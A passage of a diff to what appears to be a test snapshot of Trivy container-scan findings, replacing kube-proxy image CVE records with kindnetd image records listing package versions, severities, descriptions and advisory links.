'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4415", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ "https://access.redhat.com/errata/RHSA-2023:0954", "https://access.redhat.com/security/cve/CVE-2022-4415", @@ -165826,7 +165547,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ @@ -165908,10 +165629,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2013-4392", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", "http://www.openwall.com/lists/oss-security/2013/10/01/9", @@ -165923,7 +165644,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ @@ -165961,93 +165682,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20386", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - "https://access.redhat.com/security/cve/CVE-2019-20386", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - "https://linux.oracle.com/cve/CVE-2019-20386.html", - "https://linux.oracle.com/errata/ELSA-2020-4553.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - "https://security.netapp.com/advisory/ntap-20200210-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-20386", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20386", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20386", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - }, - { - "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2020-13529", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ "http://www.openwall.com/lists/oss-security/2021/08/04/2", "http://www.openwall.com/lists/oss-security/2021/08/17/3", @@ -166068,7 +165706,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ @@ -166142,37 +165780,47 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31437", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libxtables12", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31437", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", @@ -166180,276 +165828,377 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31438", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4899", + "installedVersion": "1.4.8+dfsg-2.1", + "packageName": "libzstd1", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "https://access.redhat.com/security/cve/CVE-2022-4899", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "https://github.com/facebook/zstd/issues/3200", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "https://www.cve.org/CVERecord?id=CVE-2022-4899", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", + "name": "buffer overrun in util.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31438", + "value": "https://avd.aquasec.com/nvd/cve-2022-4899", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://access.redhat.com/security/cve/CVE-2022-4899", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://github.com/facebook/zstd/issues/3200", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31439", - "installedVersion": "241-7~deb10u7", - "packageName": "libsystemd0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31439", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + }, + { + "type": "URL", + "value": "http://www.securityfocus.com/bid/26048", + }, + { + "type": "URL", + "value": "http://www.vupen.com/english/advisories/2007/3474", + }, + { + "type": "URL", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "4.13-3+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.13-3", - "packageName": "libtasn1-6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", + }, + { + "type": "URL", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://bugs.gentoo.org/866237", + "value": "https://github.com/shadow-maint/shadow/issues/317", + }, + { + "type": "URL", + "value": "https://github.com/shadow-maint/shadow/pull/545", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + }, + { + "type": "URL", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202210-26", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5745-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5745-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-1000654", - "installedVersion": "4.13-3", - "packageName": "libtasn1-6", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", - "http://www.securityfocus.com/bid/105151", - "https://access.redhat.com/security/cve/CVE-2018-1000654", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", - "https://gitlab.com/gnutls/libtasn1/issues/4", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", - "https://ubuntu.com/security/notices/USN-5352-1", - "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtasn1: Infinite loop in _asn1_expand_object_id(ptree) leads to memory exhaustion", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-1000654", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/105151", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-1000654", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/issues/4", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5352-1", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], "severity": "LOW", @@ -166457,2121 +166206,2121 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3843", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "http://www.securityfocus.com/bid/108116", - "https://access.redhat.com/security/cve/CVE-2019-3843", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", - "https://github.com/systemd/systemd-stable/pull/54 (backport for 